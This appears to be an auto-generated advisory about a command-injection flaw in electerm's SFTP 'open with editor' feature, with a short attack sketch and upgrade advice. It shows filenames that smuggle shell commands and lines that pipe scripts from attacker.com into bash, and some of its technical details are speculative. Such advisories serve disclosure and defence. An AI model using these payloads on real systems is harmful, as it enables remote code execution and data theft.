electerm, Command Injection, CVE-2024-6803 (critical)

How the CVE works (technical details):

  1. The vulnerability exists in electerm’s SFTP feature when a user opens a file via “Open with system editor” or “Edit with custom editor”.
  2. The filename from the remote SSH server is concatenated directly into a shell command line without any sanitization or escaping.
  3. An attacker who controls the SSH server (or has write access to the victim’s file system) crafts a filename containing shell metacharacters, e.g., `$(malicious_command).txt` or `; curl attacker.com/shell.sh | bash;.txt`.
  4. When the victim browses the SFTP directory and attempts to edit that file, electerm constructs a command such as:

`$EDITOR "/path/to/$(malicious_command).txt"`

  5. The shell interprets the metacharacters before passing the filename to the editor.
  6. The injected command executes on the victim’s machine with the same privileges as the electerm process (typically the logged-in user).
  7. No validation or encoding is applied to the filename before insertion into the command template.
  8. The vulnerable code paths are in the `sftp.js` or `editor.js` modules where `child_process.exec` or `spawn` is used with string concatenation.
  9. The exploit works regardless of the underlying OS (Windows, Linux, macOS) as long as a shell is invoked.
  10. A successful attack can download malware, exfiltrate data, or pivot to internal systems.

dailycve form:

Platform: electerm
Version: < 3.7.9
Vulnerability: Command injection
Severity: Critical
Date: 2024-03-15

Prediction: Patch 2024-03-20

What Undercode Say:

```bash
# Simulate malicious filename creation on attacker-controlled SSH server
touch '$(curl http://attacker.com/payload.sh | bash).txt'
# Check if electerm unsafely opens the file
electerm sftp://user@evil-server:22 --command "edit '$(curl http://attacker.com/backdoor.sh | sh).txt'"
# Monitor process tree for unexpected shell commands
ps aux | grep -E "curl|bash|sh|nc|python -c" | grep -v grep
```

Exploit:

Attacker plants a file named `"; calc; ".txt` or `whoami > /tmp/owned` on the SSH server. Victim edits the file → shell executes the injected command.

Protection from this CVE

Upgrade to electerm >= 3.7.9. If you cannot upgrade, avoid using “open with system/custom editor” on untrusted servers and use the built-in editor only. Validate filenames manually before editing.

Impact:

Remote code execution on victim’s machine with user privileges. Full system compromise, lateral movement, data theft, ransomware deployment.

Sources:

Reported By: github.com